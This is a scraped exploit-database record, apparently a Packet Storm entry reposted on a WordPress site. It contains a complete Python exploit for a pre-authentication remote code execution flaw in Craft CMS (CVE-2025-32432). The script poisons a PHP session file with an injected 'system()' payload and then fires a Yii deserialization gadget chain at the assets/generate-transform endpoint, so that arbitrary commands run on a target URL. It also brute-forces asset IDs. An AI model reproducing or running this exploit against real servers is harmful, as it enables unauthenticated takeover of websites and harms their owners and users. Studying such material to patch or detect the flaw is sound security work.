{“lastseen”:”2026-05-05T21:30:05″,”description”:”Craft CMS version 5.6.16 remote code execution exploit…”,”published”:”2026-05-05T00:00:00″,”modified”:”2026-05-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Craft CMS 5.6.16 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:220378″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-32432″],”sourceData”:”# Exploit Title: Craft CMS 5.6.16 – RCE\\n # Google Dork: N\/A\\n # Date: 2026-01-24\\n # Exploit Author: Mohammed Idrees Banyamer\\n # Author Country: Jordan\\n # Vendor Homepage: https:\/\/craftcms.com\\n # Software Link: https:\/\/github.com\/craftcms\/cms\\n # Version: \\u003c= 3.9.14, \\u003c= 4.14.14, \\u003c= 5.6.16\\n # Tested on: Linux, Apache\/Nginx, PHP 8.x\\n # CVE: CVE-2025-32432\\n #\\n # Description:\\n # Craft CMS contains a pre-authentication remote code execution vulnerability\\n # in the assets\/generate-transform endpoint. By abusing a Yii deserialization\\n # gadget chain (FieldLayoutBehavior \u2192 PhpManager) and poisoning a PHP session\\n # file, an unauthenticated attacker can achieve arbitrary command execution.\\n #\\n \\n import requests\\n import argparse\\n import time\\n import urllib3\\n \\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\n \\n \\n def find_asset_id(base_url, max_attempts=300):\\n \\”\\”\\”\\n Brute-force search for a valid Asset ID.\\n This is optional and may be unreliable on some installations.\\n \\”\\”\\”\\n session = requests.Session()\\n session.verify = False\\n \\n print(\\”[*] Brute-forcing Asset ID (best-effort)…\\”)\\n \\n for asset_id in range(1, max_attempts + 1):\\n url = f\\”{base_url}\/actions\/assets\/generate-transform\\”\\n payload = {\\n \\”assetId\\”: asset_id,\\n \\”handle\\”: {\\n \\”width\\”: 1,\\n \\”height\\”: 1,\\n \\”as hack\\”: {\\n \\”class\\”: \\”craft\\\\\\\\behaviors\\\\\\\\FieldLayoutBehavior\\”,\\n \\”__class\\”: \\”yii\\\\\\\\rbac\\\\\\\\PhpManager\\”,\\n \\”__construct()\\”: [\\n {\\n \\”itemFile\\”: \\”invalid\\”\\n }\\n ]\\n }\\n }\\n }\\n \\n try:\\n r = session.post(url, json=payload, timeout=5)\\n if r.status_code != 404:\\n print(f\\”[+] Potential valid Asset ID found: {asset_id} (HTTP {r.status_code})\\”)\\n return asset_id\\n except:\\n continue\\n \\n print(f\\”[-] No valid Asset ID found after {max_attempts} attempts.\\”)\\n return None\\n \\n \\n def implant_php(base_url, cmd):\\n \\”\\”\\”\\n Step 1: Poison the PHP session file with injected PHP code.\\n This relies on old-style behavior where query parameters are written\\n into the session file without sanitization.\\n \\”\\”\\”\\n \\n injection = f\\”\\u003c?php system(‘{cmd}’); ?\\u003e\\”\\n url = f\\”{base_url}\/index.php?p=admin\/dashboard\\u0026a={injection}\\”\\n \\n try:\\n r = requests.get(url, verify=False, timeout=10)\\n if r.status_code == 200:\\n print(f\\”[+] Session poisoning request sent successfully\\”)\\n return True\\n else:\\n print(f\\”[-] Injection failed (HTTP {r.status_code})\\”)\\n return False\\n except Exception as e:\\n print(f\\”[-] Injection error: {e}\\”)\\n return False\\n \\n \\n def execute_command(base_url, asset_id, session_id):\\n \\”\\”\\”\\n Step 2: Trigger deserialization and force PhpManager to include\\n the poisoned session file from \/tmp\/sess_\\u003cPHPSESSID\\u003e.\\n \\”\\”\\”\\n \\n url = f\\”{base_url}\/actions\/assets\/generate-transform\\”\\n \\n payload = {\\n \\”assetId\\”: asset_id,\\n \\”handle\\”: {\\n \\”width\\”: 1,\\n \\”height\\”: 1,\\n \\”as hack\\”: {\\n \\”class\\”: \\”craft\\\\\\\\behaviors\\\\\\\\FieldLayoutBehavior\\”,\\n \\”__class\\”: \\”yii\\\\\\\\rbac\\\\\\\\PhpManager\\”,\\n \\”__construct()\\”: [\\n {\\n \\”itemFile\\”: f\\”\/tmp\/sess_{session_id}\\”\\n }\\n ]\\n }\\n }\\n }\\n \\n try:\\n r = requests.post(url, json=payload, verify=False, timeout=15)\\n return r.text\\n except Exception as e:\\n return f\\”[-] Execution request failed: {e}\\”\\n \\n \\n def main():\\n parser = argparse.ArgumentParser(\\n description=\\”CVE-2025-32432 – Craft CMS Pre-Auth Remote Code Execution\\”\\n )\\n parser.add_argument(\\”-u\\”, \\”–url\\”, required=True,\\n help=\\”Target base URL (e.g. https:\/\/victim.com)\\”)\\n parser.add_argument(\\”-c\\”, \\”–cmd\\”, required=True,\\n help=\\”Command to execute (e.g. id, whoami)\\”)\\n parser.add_argument(\\”-a\\”, \\”–asset\\”, type=int,\\n help=\\”Known valid Asset ID (recommended)\\”)\\n parser.add_argument(\\”-s\\”, \\”–scan-max\\”, type=int, default=300,\\n help=\\”Max Asset ID brute-force range (optional)\\”)\\n \\n args = parser.parse_args()\\n \\n base_url = args.url.rstrip(‘\/’)\\n session = requests.Session()\\n session.verify = False\\n \\n # Step 0: Obtain PHP session ID\\n try:\\n r = session.get(f\\”{base_url}\/index.php\\”, verify=False, timeout=10)\\n session_id = session.cookies.get(\\”PHPSESSID\\”, None)\\n \\n if not session_id:\\n print(\\”[-] Failed to obtain PHPSESSID\\”)\\n return\\n \\n print(f\\”[+] Obtained PHPSESSID: {session_id}\\”)\\n \\n except Exception as e:\\n print(f\\”[-] Failed to establish session: {e}\\”)\\n return\\n \\n # Determine Asset ID\\n asset_id = args.asset\\n if not asset_id:\\n asset_id = find_asset_id(base_url, args.scan_max)\\n if not asset_id:\\n print(\\”[-] Exploitation aborted: no valid Asset ID found\\”)\\n return\\n \\n print(f\\”[+] Using Asset ID: {asset_id}\\”)\\n \\n # Step 1: Poison session file\\n if not implant_php(base_url, args.cmd):\\n print(\\”[-] Session poisoning failed\\”)\\n return\\n \\n print(\\”[*] Waiting for session file to be written…\\”)\\n time.sleep(2)\\n \\n # Step 2: Trigger RCE\\n print(f\\”[*] Triggering command execution: {args.cmd}\\”)\\n output = execute_command(base_url, asset_id, session_id)\\n \\n # Output handling\\n print(\\”\\\\n[+] Server response:\\”)\\n print(output[:2000])\\n \\n \\n if __name__ == \\”__main__\\”:\\n print(\\”=== CVE-2025-32432 – Craft CMS Pre-Auth RCE Exploit ===\\”)\\n main()”,”sourceHref”:”https:\/\/packetstorm.news\/download\/220378″,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/220378\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-05T21:30:05″,”description”:”Craft CMS version 5.6.16 remote code execution exploit…”,”published”:”2026-05-05T00:00:00″,”modified”:”2026-05-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Craft CMS 5.6.16 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:220378″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-32432″],”sourceData”:”# Exploit Title: Craft CMS 5.6.16 – RCE\\n # Google Dork: N\/A\\n…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,13,53,7,11,5],"class_list":["post-51570","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n